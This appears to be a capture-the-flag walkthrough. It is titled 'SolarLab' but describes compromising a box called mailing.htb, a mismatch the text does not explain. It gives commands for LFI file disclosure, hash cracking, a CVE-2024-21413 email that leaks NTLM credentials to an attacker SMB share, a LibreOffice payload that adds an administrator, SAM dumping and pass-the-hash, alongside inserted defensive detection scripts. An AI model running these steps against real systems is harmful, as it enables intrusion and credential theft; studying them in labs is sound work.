SolarLab
SolarLab - Medium Windows Box - Season 5 Anomalies.
There are a lot of open ports on this box. Among the noteworthy highlights is that hMailServer is running.

Running wapiti3 against our target we get an instant hit with `LFI` on the `/downloads` path. We know hMailServer is installed, so let's see if we can find anything in its folder with the LFI. We find the server's `.INI` file, which contains its setup information:

```ini
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
[Database]
Type=MSSQLCE
Username=
Password=0a9f8ad8bf896b501dde74f08efd7e4c
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1
```
Cracking the `AdministratorPassword` hash `841bb5acfa6779ae432fd7a4e6600ba7` by running the `rockyou.txt` word list on it gives us `homenetworkingadministrator`. The database password `0a9f8ad8bf896b501dde74f08efd7e4c` is proving to be more difficult. Decrypting the password with this tool gives us `6FC6F69152AD`, though I'm not sure what to do with it at this moment.
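As an added defender-side example (not code from the writeup), the following Python scans web-server access-log lines for file-parameter values that escape the download directory, which is how the INI above was read; the log lines, client addresses and the parameter names other than `file` are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (not from the box). The second and
# third requests are the shape a file-disclosure probe against the download
# endpoint takes: a relative traversal and an absolute Windows path.
SAMPLE_LOG = """\
10.0.0.5 - - [01/May/2024:10:00:01 +0000] "GET /download.php?file=instructions.pdf HTTP/1.1" 200 5120
10.0.0.9 - - [01/May/2024:10:00:07 +0000] "GET /download.php?file=../../../Program%20Files%20(x86)/hMailServer/hMailServer.INI HTTP/1.1" 200 1210
10.0.0.9 - - [01/May/2024:10:00:09 +0000] "GET /download.php?file=C:\\Windows\\win.ini HTTP/1.1" 200 403
10.0.0.5 - - [01/May/2024:10:00:11 +0000] "GET /index.php HTTP/1.1" 200 2048
"""

REQ_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Parameters that name a file on disk; `file` is the one this box's download.php uses.
FILE_PARAMS = ("file", "path", "doc")

def is_traversal(value: str) -> bool:
    """True if a file-name parameter escapes its intended directory."""
    # Decode twice so double-encoded %252e%252e is also caught, then normalise
    # Windows separators; a NUL byte is the classic extension-truncation trick.
    v = unquote(unquote(value)).replace("\\", "/")
    return (".." in v.split("/")) or v.startswith("/") \
        or re.match(r"^[A-Za-z]:/", v) is not None or "\x00" in v

def flag_lfi(log_text: str) -> list[tuple[str, str]]:
    """Return (client_ip, raw_param_value) for every suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = REQ_RE.match(line)
        if not m:
            continue
        query = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        for name in FILE_PARAMS:
            for raw in query.get(name, []):
                if is_traversal(raw):
                    hits.append((m["ip"], raw))
    return hits

if __name__ == "__main__":
    for ip, value in flag_lfi(SAMPLE_LOG):
        print(f"LFI attempt from {ip}: file={value!r}")
```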
We can test the recovered credential against the POP3 service:

```text
telnet boxIP 110
USER administrator@mailing.htb
PASS homenetworkingadministrator
LIST
RETR 1
```

We can log in as `administrator@mailing.htb` using the administrator password, but it appears there's nothing in the mailbox.

Going back to the website we can see a "download instructions" button at the bottom of the screen. It leads to a PDF you can download with instructions on how to connect to the mail server:
http://mailing.htb/download.php?file=instructions.pdf

Let's follow the instructions and set up Thunderbird on our Linux box to connect to the mailbox. Using the found credentials `administrator:homenetworkingadministrator`, let's sign into the mailbox.
Reading the instructions PDF, we notice at the end that we are to email maya@mailing.htb to get a response from them. This is hinting at a Responder attack. Let's see where it goes. Email sent to maya@mailing.htb:

```text
My first email!
Hi Maya! This is my first mail.
```
We start `responder` and wait to catch the reply back. Let's see if we can get any hits. We probably need to send a malicious email that will cause Maya's client to reach back to our server.

Looking around for hMailServer / Outlook vulnerabilities we stumble across a recent CVE, CVE-2024-21413, that looks promising:
https://sploitus.com/exploit?id=425B7616-AF36-5AD0-912F-A6B7A45E41E6

We can use this CVE to send a crafted email to Maya in the hope that when she clicks on it, her client reaches back out to an SMB server we have set up, and we can catch that authentication with Responder.

```shell
sudo impacket-smbserver smbFolder $(pwd) -smb2support
python3 CVE-2024-21413.py --server mailing.htb --port 587 --username administrator@mailing.htb --password homenetworkingadministrator --sender administrator@mailing.htb --recipient maya@mailing.htb --url '\\<boxip>\SMBSHARE' --subject XD
```
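Added defensive example, not part of the writeup or the PoC: a mail-filter check that parses an HTML message and flags any link whose target is a UNC share or a `file:` URL, the kind of link that makes a client authenticate to an outside SMB server as described above. The message is constructed and 203.0.113.10 is a documentation address.

```python
import email
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed message (not the one sent on the box): one link points at a
# UNC path on an outside host, the other is an ordinary HTTPS link.
SAMPLE_EML = b"""\
From: administrator@mailing.htb
To: maya@mailing.htb
Subject: XD
Content-Type: text/html; charset=utf-8

<html><body>
<p>Please review the <a href="\\\\203.0.113.10\\SMBSHARE\\doc.txt">document</a>.</p>
<p>Docs: <a href="https://mailing.htb/download.php?file=instructions.pdf">here</a></p>
</body></html>
"""

class _LinkCollector(HTMLParser):
    """Collects the href of every <a> tag in an HTML body."""
    def __init__(self):
        super().__init__()
        self.links = []
    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.links.append(value)

def is_smb_link(href: str) -> bool:
    """True for links that make a mail client open a network share or local file."""
    h = href.strip()
    if h.startswith("\\\\") or h.startswith("//"):   # UNC in either slash form
        return True
    return urlsplit(h).scheme.lower() in ("file", "smb")

def flag_message(raw: bytes) -> list[str]:
    """Return every link in the message's HTML parts that should be quarantined."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    flagged = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        collector = _LinkCollector()
        collector.feed(part.get_content())
        flagged.extend(h for h in collector.links if is_smb_link(h))
    return flagged

if __name__ == "__main__":
    for href in flag_message(SAMPLE_EML):
        print("quarantine: link to share or local file:", href)
```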
We managed to capture an NTLM hash for `maya`, which cracks to `m4y4ngs4ri`. We can use this to evil-winrm onto the box and get our foothold:

```shell
evil-winrm -i mailing.htb -u maya -p 'm4y4ngs4ri'
```
The user flag is on maya's `Desktop`. Exploring around we find an interesting app installed in `Program Files`: LibreOffice. After running winPEAS and not having much luck seeing any attack vector, I was looking for vulnerable applications. The installed LibreOffice version is 7.4, and we discover a CVE related to this version:
https://www.libreoffice.org/about-us/security/advisories/CVE-2023-2255
We can escalate our local privileges to administrator using this exploit. Let's proceed with attempts.

In affected versions of LibreOffice these floating frames fetch and display their linked document without prompting when the host document is loaded. Essentially you can load remote files without the user being prompted that a file is being loaded.

We can use this PoC to generate a malicious payload that executes and gains us administrator access:
https://github.com/elweth-sec/CVE-2023-2255.git

The PoC builds an `.odt` file that injects the command to add maya to the local `Administradores` group:

```shell
python3 CVE-2023-2255.py --cmd 'net localgroup Administradores maya /add' --output 'exploit.odt'
```
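Added detection-side example, not from the writeup or the PoC: a scanner that opens an `.odt` package, reads `content.xml` and lists every floating frame together with whether its link points outside the document, which is the unprompted-load behaviour the advisory describes. The `make_odt` helper only builds constructed test documents; the ODF namespaces are the standard ones.

```python
import html
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

OFFICE = "urn:oasis:names:tc:opendocument:xmlns:office:1.0"
TEXT = "urn:oasis:names:tc:opendocument:xmlns:text:1.0"
DRAW = "urn:oasis:names:tc:opendocument:xmlns:drawing:1.0"
XLINK = "http://www.w3.org/1999/xlink"

def scan_odt(data: bytes) -> list[tuple[str, bool]]:
    """Return (href, is_external) for every floating frame in content.xml.
    An href with a scheme or host, or an absolute/UNC path, is fetched from
    outside the package as soon as the document is opened."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        root = ET.fromstring(z.read("content.xml"))
    found = []
    for frame in root.iter(f"{{{DRAW}}}floating-frame"):
        href = frame.get(f"{{{XLINK}}}href", "")
        parts = urlsplit(href)
        external = bool(parts.scheme or parts.netloc) or href.startswith(("\\\\", "/"))
        found.append((href, external))
    return found

def make_odt(frame_href: str = "") -> bytes:
    """Build a minimal constructed .odt in memory; a non-empty href adds one floating frame."""
    frame = ""
    if frame_href:
        frame = (f'<draw:frame><draw:floating-frame xlink:href="{html.escape(frame_href, quote=True)}"'
                 f' draw:frame-name="f1"/></draw:frame>')
    content = (f'<office:document-content xmlns:office="{OFFICE}" xmlns:text="{TEXT}"'
               f' xmlns:draw="{DRAW}" xmlns:xlink="{XLINK}">'
               f'<office:body><office:text><text:p>{frame}</text:p></office:text></office:body>'
               f'</office:document-content>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        # ODF requires the mimetype entry to come first and be stored uncompressed.
        z.writestr("mimetype", "application/vnd.oasis.opendocument.text", compress_type=zipfile.ZIP_STORED)
        z.writestr("content.xml", content, compress_type=zipfile.ZIP_DEFLATED)
    return buf.getvalue()

if __name__ == "__main__":
    print("clean document:", scan_odt(make_odt()))
    print("linked frame:  ", scan_odt(make_odt("http://203.0.113.10/frame.html")))  # constructed link
```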
Now that we have crafted the payload we need to upload it to the victim. There is a suspicious `Important Documents` directory in `C:\` with nothing inside it. Let's upload it there. Let's check `maya`'s privileges beforehand.

NOTICE: It's not `Administrators` but `Administradores`; it's in Portuguese. If you use `Administrators` (English) it will not work!

`maya` was added to the `Administradores` group. Trying `localadmin`'s profile, though, we are still denied. Since we now have administrator rights as `maya`, let's bust out one of our trusty Windows tools, crackmapexec.
We are going to connect to the SMB service we discovered in our recon during the initial engagement:

```text
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 127
```

Running crackmapexec with the `--sam` flag allows us to request the SAM database and get the password hashes. The `--sam` flag requests the SAM database from the target if the credentials are valid and the user has the necessary permissions. This database is a critical part of Windows security, containing hashed passwords and other sensitive information.

We get the `localadmin` hash. Now we can perform a pass-the-hash attack and remote into the box with this hash:

```text
localadmin:1001:aad3b435b51404eeaad3b435b51404ee:9aa582783780d1546d62f2d102daefae:::
```

```shell
impacket-wmiexec localadmin@mailing.htb -hashes "aad3b435b51404eeaad3b435b51404ee:9aa582783780d1546d62f2d102daefae"
```

We are now `localadmin` on this box.
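Added example from the defender's side, not from the writeup: an audit of a hash dump in the `user:rid:lm:nt:::` format shown above, flagging stored LM hashes, empty passwords and NT-hash reuse across accounts, which is what lets one dumped hash be passed against several accounts. All dump lines and hashes below are constructed except the two well-known constants.

```python
import re

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash when LM storage is disabled
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password

# Constructed dump (fake NT hashes); localadmin and svc_backup share a password.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
localadmin:1001:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
maya:1002:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
svc_backup:1003:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
"""

LINE_RE = re.compile(r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::")

def parse_dump(text: str) -> list[dict]:
    """Parse secretsdump-style lines; anything that does not match is ignored."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            rows.append({"user": m["user"], "rid": int(m["rid"]), "lm": m["lm"], "nt": m["nt"]})
    return rows

def audit(rows: list[dict]) -> dict[str, list]:
    """Summarise what a dumped SAM means for pass-the-hash exposure."""
    findings = {"lm_stored": [], "empty_password": [], "nt_reuse": []}
    by_nt: dict[str, list[str]] = {}
    for r in rows:
        if r["lm"] != EMPTY_LM:
            findings["lm_stored"].append(r["user"])       # LM hashes crack almost instantly
        if r["nt"] == EMPTY_NT and r["rid"] != 501:         # Guest is expected to be empty
            findings["empty_password"].append(r["user"])  # check whether the account is disabled
        by_nt.setdefault(r["nt"], []).append(r["user"])
    for nt, users in by_nt.items():
        # Same NT hash means same password: one dumped hash logs into every such account.
        if len(users) > 1 and nt != EMPTY_NT:
            findings["nt_reuse"].append(sorted(users))
    return findings

if __name__ == "__main__":
    for kind, items in audit(parse_dump(SAMPLE_DUMP)).items():
        print(f"{kind}: {items}")
```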